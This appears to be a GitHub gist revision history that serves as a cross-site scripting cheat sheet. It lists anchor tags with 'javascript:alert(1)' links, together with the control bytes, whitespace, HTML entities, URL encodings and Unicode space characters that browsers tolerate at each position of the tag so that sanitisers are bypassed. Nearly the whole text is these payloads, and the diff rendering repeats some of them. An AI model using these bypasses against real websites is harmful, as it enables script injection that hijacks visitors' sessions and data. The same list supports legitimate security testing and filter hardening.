Last active
October 27, 2025 03:26
-
-
Save hackerscrolls/5c0990dfc734eeb4a9ce8cf2ccdf6fba to your computer and use it in GitHub Desktop.
Revisions
-
hackerscrolls revised this gist
Jun 17, 2020 . 1 changed file with 23 additions and 7 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,29 +1,35 @@ <a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)"> [1] Bytes: \x09 \x0a \x0c \x0d \x20 \x2f <a/href="javascript:alert(1)"> <a\x09href="javascript:alert(1)"> [2,3] Bytes: \x09 \x0a \x0c \x0d \x20 <a href\x20="javascript:alert(1)"> <a href=\x20"javascript:alert(1)"> [4] Bytes: \x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20 HTML Encoding:         	 
   
                     <a href="	javascript:alert(1)"> <a href="javascript:alert(1)"> [5] Bytes: \x09 \x0a \x0d HTML Encoding: 	 
 
 <a href="javas\x09cript:alert(1)"> <a href="javas	cript:alert(1)"> @@ -32,10 +38,20 @@ Allowed encodings: HTML Bytes: \x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0 URL Encode (bytes): %09 %0a %0b %0c %0d %20 %21 %2b %2d %3b %7e %a0 HTML Encode (bytes): 	 
   
   ! + - ; ~   UTF-8 Symbols: \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff URL Encode (UTF-8): %e1%9a%80 %e2%80%80 %e2%80%81 %e2%80%82 %e2%80%83 %e2%80%84 %e2%80%85 %e2%80%86 %e2%80%87 %e2%80%88 %e2%80%89 %e2%80%8a %e2%80%a8 %e2%80%a9 %e2%80%af %e2%81%9f %e3%80%80 %ef%bb%bf HTML Encode (UTF-8):                         
 
        <a href="javascript:~alert(1)"> <a href="javascript://%0d%0aalert(1)"> -
Jun 17, 2020 . 1 changed file with 0 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -28,7 +28,6 @@ Allowed encodings: HTML <a href="javas\x09cript:alert(1)"> <a href="javas	cript:alert(1)"> [6] Bytes: \x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0 -
Jun 17, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,61 @@ <a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)"> [1] Bytes: \x09 \x0a \x0c \x0d \x20 \x2f <a/href="javascript:alert(1)"> <a\x09href="javascript:alert(1)"> [2,3] Bytes: \x09 \x0a \x0c \x0d \x20 <a href\x20="javascript:alert(1)"> <a href=\x20"javascript:alert(1)"> [4] Bytes: \x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20 Allowed encodings: HTML <a href="	javascript:alert(1)"> <a href="javascript:alert(1)"> [5] Bytes: \x09 \x0a \x0d Allowed encodings: HTML <a href="javas\x09cript:alert(1)"> <a href="javas	cript:alert(1)"> [6] Bytes: \x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0 UTF-8 Symbols: \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff Allowed encodings: HTML, URL <a href="javascript:~alert(1)"> <a href="javascript://%0d%0aalert(1)"> <a href="javascript:\x0calert(1)"> <a href="javascript:%ef%bb%bfalert(1)"> <a href="javascript:alert(1)"> ----------------------------------------- We use char codes to show non printable symbols \x00 - ASCII hex code \x20 - SPACE \x0a - NEW LINE \u0000 - UTF-8 char code \u1680 - OGHAM SPACE MARK \u2028 - LINE SEPARATOR Encoding UTF-8 to URL isn’t obvious: \u1680 -> %e1%9a%80 \u2028 -> %e2%80%a8